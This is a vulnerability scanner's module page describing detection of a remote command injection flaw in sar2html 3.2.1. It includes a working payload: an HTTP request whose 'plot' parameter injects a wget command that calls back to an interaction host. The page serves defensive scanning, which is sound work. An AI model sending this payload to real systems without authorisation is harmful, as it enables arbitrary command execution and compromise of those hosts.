Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

sar2html 3.2.1 - Remote Command Injection

By kannthu

Critical
Vidoc logoVidoc Module
#sar2html#rce#oast#edb
Description

What is the "sar2html 3.2.1 - Remote Command Injection?" module?

The "sar2html 3.2.1 - Remote Command Injection" module is designed to detect a vulnerability in the SAR2HTML software. SAR2HTML is a tool used for generating graphical reports from system activity data collected by the SAR command. This module focuses on a specific version of SAR2HTML (3.2.1) and identifies a critical remote command injection vulnerability.

The severity of this vulnerability is classified as critical, indicating that it poses a significant risk to the affected system. It allows a remote attacker to execute arbitrary commands on the target system by exploiting a command injection flaw in the index.php script of SAR2HTML.

This module was authored by gy741.

Impact

If successfully exploited, this vulnerability could allow an attacker to execute arbitrary commands on the target system. This can lead to unauthorized access, data theft, system compromise, and potential disruption of services.

How does the module work?

The module works by sending a specially-crafted HTTP request to the target system's index.php script. The request includes a command injection payload that exploits the vulnerability in SAR2HTML 3.2.1. Upon successful exploitation, the attacker gains the ability to execute arbitrary commands on the target system.

Here is an example of the HTTP request used by the module:

GET /index.php?plot=;wget%20http://{%InteractionURL%} HTTP/1.1
Host: {%Hostname%}
Accept: */*

The module also includes matching conditions to ensure accurate detection. In this case, it checks for the presence of the "http" protocol in the interaction URL, indicating a successful match.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: http
Passive global matcher
No matching conditions.
On match action
Report vulnerability